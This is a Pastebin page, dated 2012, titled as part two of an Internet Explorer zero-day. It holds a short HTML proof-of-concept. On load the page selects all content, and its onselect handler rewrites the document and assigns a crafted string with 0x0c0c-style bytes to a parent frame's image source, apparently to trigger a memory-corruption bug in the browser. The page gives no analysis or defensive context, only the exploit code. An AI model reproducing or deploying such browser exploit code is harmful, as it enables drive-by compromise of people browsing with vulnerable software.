Advertisement
elreg_cw

Part two of the September IE 0-day

Sep 18th, 2012
1,350
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.33 KB | None | 0 0
  1. <html>
  2. <script>
  3. functionfuncB() {
  4. document.execCommand("selectAll");
  5. };
  6.  
  7. functionfuncA() {
  8. document.write("L");
  9. parent.arrr[0].src="YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
  10. }
  11. </script>
  12.  
  13. <body onload='funcB();' onselect='funcA()'>
  14. <div contenteditable='true'>
  15. a
  16. </div>
  17. </body>
  18. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement